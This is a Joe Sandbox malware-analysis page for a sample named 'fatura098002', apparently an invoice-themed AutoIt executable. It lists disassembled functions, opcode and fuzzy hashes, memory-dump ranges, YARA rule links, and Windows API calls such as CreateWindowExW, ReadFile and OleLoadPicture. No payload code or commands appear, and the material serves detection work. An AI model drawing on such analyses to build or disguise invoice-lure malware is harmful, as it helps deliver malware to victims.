
Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 1bc2b8d32207f295fa56f6d61625ac1c79edff9bb266888d260a7e9d1e4a7be7
Instruction ID: 0afb493827faf149300f3d095ee3255f80b83e300b64af8e1cef11e8e6913564
Opcode Fuzzy Hash: 1bc2b8d32207f295fa56f6d61625ac1c79edff9bb266888d260a7e9d1e4a7be7
Instruction Fuzzy Hash: D2D012B0144308B7EF616BA4DC0BF893E299B00BA0F508021F704392D1CA7A65A15559

Function 007209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,007203EE), ref: 007209DA

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 50e665e8b219447885da1c83d0cba2adfc3a77e7b8bfb80f86bbf2b1baa65842
Instruction ID: d703a797928342138d5546fbbdaaa013681d218f7d386626b474f0fcaf9e199e
Opcode Fuzzy Hash: 50e665e8b219447885da1c83d0cba2adfc3a77e7b8bfb80f86bbf2b1baa65842
Instruction Fuzzy Hash:

Function 0072781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0072798B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 165eaa8e1ab9d77404ab4fa4c76b1a4ec884c5ed9837e2529eb17e5a490c76c4
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 5851797160C7759BDB3C8578BB9E7BE23999B12300F18050DE9C2DB282C61DEE81D356

Function 00772046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&}, xrefs: 00772053

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: 0&}
API String ID: 0-910209575
Opcode ID: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
Instruction ID: 320f1ef74768164018f07010d17f4718938b5a3e8f27150fa66dcb2e42e8871b
Opcode Fuzzy Hash: 7de6beec07c6d8d7f6ac8e9adef1ee298ef86a72ddede826677d7c49c78fd660
Instruction Fuzzy Hash: 8621A8327216118BDB28CF79C81267E73E5A764310F19CA2EE4A7C37D1DE39A905C794

Function 00736DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
Instruction ID: 4b73cb52583a0e08dcf4ed86eba3e5c74ce06cbc43148dfc147f4fb302c679d8
Opcode Fuzzy Hash: 63c9806b3b2e628cede65ba276a0613d13e68530c5af9a3ae3489e316115d760
Instruction Fuzzy Hash: 3E321362D29F414DE72B9638C8223356649AFB73C5F15D727E81AB5DA7EB2DC4C38100

Function 0071CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
Instruction ID: 9c9131c7025a3e0b35a6a48707e85508252542f51c2fdb0c1c25cb4542bbc540
Opcode Fuzzy Hash: 14620c4cd04780aee4a01c3d0fe6bfe60cfdfc753956e444d6a869885518e540
Instruction Fuzzy Hash: 3E321731A003058FDF26CEA8C4947FD7BA1EB45302F28856ADC49DB291E67CDD89DB94

Function 00707920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03800964ab558a596f91e1dc39dceb644eef0349f9bea1725c6f3de65cda6382
Instruction ID: 4f6cd95265e02e5a5f839d70245a26f32ea1e691ca29f4e7e06a330a68611c58
Opcode Fuzzy Hash: 03800964ab558a596f91e1dc39dceb644eef0349f9bea1725c6f3de65cda6382
Instruction Fuzzy Hash: A822A2B0E04609DFDF14CF68D845AAEB7F5FF44300F148629E816AB292EB39AD55CB50

Function 007091C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1db505c15303523379fc4c5a8315d62801c24031239038ee127e25c4ba876d
Instruction ID: 58ab2b403b317675b5b269d2bcd297ab9d548e2c7c08a8edbd9077277ce9e2f4
Opcode Fuzzy Hash: 2f1db505c15303523379fc4c5a8315d62801c24031239038ee127e25c4ba876d
Instruction Fuzzy Hash: A502B5B0E00205EFDB04DF64D885AAEB7F1FF44310F118169E9169B2D1EB39EA54CB91

Function 00721C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 9e92e5e231fd5340c43ea086814f31d730e69c3155d06a0e70a2c8fdb5d3f7ba
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: E99189726090F34ADB29463EA57403EFFE17A623A235A079DD4F2CB1C5FE28D954D620

Function 007219B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 90f2874333acf5bd2a1fbb827fbe6dbfdf70eb9bcaa6ace4aaad94c20f467a56
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: D19156722090F34EDB2D467AA57403DFFF16AA23A139A47AED4F2CA1C1FD28D554D620

Function 00727A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5c6d8d4cde9b076fced345da3ed7dc163980f80be900d0e73b338a8748e79dd
Instruction ID: 3d3f022a019d6df7ebd77cd6229e76a38abb47d207232bcdc07625e057a0a8c7
Opcode Fuzzy Hash: d5c6d8d4cde9b076fced345da3ed7dc163980f80be900d0e73b338a8748e79dd
Instruction Fuzzy Hash: 35616DB120877597DF3C592CBF95BBE23A8DF41710F14491DE842DB281D51D9E81C366

Function 00721706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 311e3a80d7cf7b6cf34c321ec8613f82ab228fab317144c951525ed5c77d4272
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 938176726090F34ADB6D423A957443EFFE17AA23B135A07ADD4F2CB1C1EE28D654D620

Function 00FD2928 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 38975a922b134dee9ab4a5d832e509e096a64f5263952e2fde3076128fd672a0
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 6341C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB80

Function 00FD27B8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: e276e1b007eb711f2abe949d0767cbb88388fc8591d28ec4d07ca0addfb3c692
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E6019679E01109EFCB94DF98C5909AEF7B6FB58310F24859AD815A7341D730AE41EB80

Function 00FD2818 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 196b47c52099e2bddc8da388c5d4429e727c9cd4b30c85eaf73d4fe2afdcbdce
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: A8019674E01209EFCB94DF98C5909AEF7B6FF58310F24859AD819A7305D730AE41EB80

Function 00FD1178 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00782ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00782B30
DeleteObject.GDI32(00000000), ref: 00782B43
DestroyWindow.USER32 ref: 00782B52
GetDesktopWindow.USER32 ref: 00782B6D
GetWindowRect.USER32(00000000), ref: 00782B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00782CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00782CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782CF8
GetClientRect.USER32(00000000,?), ref: 00782D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00782D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D80
GlobalLock.KERNEL32(00000000), ref: 00782D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782D98
GlobalUnlock.KERNEL32(00000000), ref: 00782DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782DA8
GlobalFree.KERNEL32(00000000), ref: 00782DB3
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00782DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0079FC38,00000000), ref: 00782DDB
GlobalFree.KERNEL32(00000000), ref: 00782DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00782E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00782E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00782E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0078303F

Strings

AutoIt v3, xrefs: 00782CF2
, xrefs: 00782FC5
DISPLAY, xrefs: 00782EA2
static, xrefs: 00782D3A, 00782E91

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
Instruction ID: ae79f387ba1d755d0cfbec3f85f8c3bd469552c3a74df14bfc4b1d02c544d31c
Opcode Fuzzy Hash: 4c25efc3439d027a08ec68ebdb2c82ab6cab3d2b127d1ff3a31e6c967418cf19
Instruction Fuzzy Hash: 7B027E71900204EFDB15DFA4CC89EAE7BB9FF48715F008159F915AB2A1DB78AD02CB64

Function 007970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0079712F
GetSysColorBrush.USER32(0000000F), ref: 00797160
GetSysColor.USER32(0000000F), ref: 0079716C
SetBkColor.GDI32(?,000000FF), ref: 00797186
SelectObject.GDI32(?,?), ref: 00797195
InflateRect.USER32(?,000000FF,000000FF), ref: 007971C0
GetSysColor.USER32(00000010), ref: 007971C8
CreateSolidBrush.GDI32(00000000), ref: 007971CF
FrameRect.USER32(?,?,00000000), ref: 007971DE
DeleteObject.GDI32(00000000), ref: 007971E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00797230
FillRect.USER32(?,?,?), ref: 00797262
GetWindowLongW.USER32(?,000000F0), ref: 00797284

Part of subcall function 007973E8: GetSysColor.USER32(00000012), ref: 00797421
Part of subcall function 007973E8: SetTextColor.GDI32(?,?), ref: 00797425
Part of subcall function 007973E8: GetSysColorBrush.USER32(0000000F), ref: 0079743B
Part of subcall function 007973E8: GetSysColor.USER32(0000000F), ref: 00797446
Part of subcall function 007973E8: GetSysColor.USER32(00000011), ref: 00797463
Part of subcall function 007973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00797471
Part of subcall function 007973E8: SelectObject.GDI32(?,00000000), ref: 00797482
Part of subcall function 007973E8: SetBkColor.GDI32(?,00000000), ref: 0079748B
Part of subcall function 007973E8: SelectObject.GDI32(?,?), ref: 00797498
Part of subcall function 007973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007974B7
Part of subcall function 007973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007974CE
Part of subcall function 007973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007974DB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 84602e6245fba701c3f8d5510af1ff51c3868f79f0c19664be0eb1eea8c9ab51
Instruction ID: b344b4b66680d151031df0f73913cd2bc26e6ff2b6361f9b583a27f5decda50c
Opcode Fuzzy Hash: 84602e6245fba701c3f8d5510af1ff51c3868f79f0c19664be0eb1eea8c9ab51
Instruction Fuzzy Hash: 44A1BF72018305EFDF069F64EC48A6B7BB9FF88320F104A1AF962961E1D738E945CB55

Function 00782711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0078273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0078286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007828A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007828B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00782900
GetClientRect.USER32(00000000,?), ref: 0078290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00782955
